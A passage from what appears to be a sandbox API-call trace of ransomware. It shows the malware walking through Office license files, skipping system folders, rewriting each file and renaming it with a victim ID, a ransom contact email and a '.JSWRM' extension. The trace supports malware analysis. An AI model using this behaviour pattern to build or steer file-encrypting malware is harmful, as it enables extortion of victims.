lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.872] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0106.872] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0106.872] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0106.875] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.876] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0106.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.876] CloseHandle (hObject=0x45c) returned 1 [0106.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0106.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0106.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0106.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.888] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.889] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe841c43e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe841c43e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe850125e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Retail-ppd.xrm-ms", cAlternateFileName="PEA352~1.XRM")) returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.889] lstrcmpiW (lpString1="PersonalR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241128, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241218, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0106.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.890] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20992) returned 1 [0106.890] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5200) returned 0x24c1d0 [0106.890] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5200, lpOverlapped=0x0) returned 1 [0106.895] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.895] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5200, lpOverlapped=0x0) returned 1 [0106.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.895] CloseHandle (hObject=0x45c) returned 1 [0106.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0106.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.896] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0106.897] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe83f61d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe83f61d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe84db012, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d45, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Retail-ul-oob.xrm-ms", cAlternateFileName="PEC01B~1.XRM")) returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.897] lstrcmpiW (lpString1="PersonalR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0106.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0106.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.898] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11589) returned 1 [0106.898] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.898] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.902] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.902] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.902] CloseHandle (hObject=0x45c) returned 1 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0106.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.903] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0106.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0106.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.904] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe83a9d5d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe83a9d5d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe848eb48, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dde, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Retail-ul-phn.xrm-ms", cAlternateFileName="PE4CF9~1.XRM")) returned 1 [0106.918] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.918] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.918] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.918] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.919] lstrcmpiW (lpString1="PersonalR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.919] RtlAllocateHeap 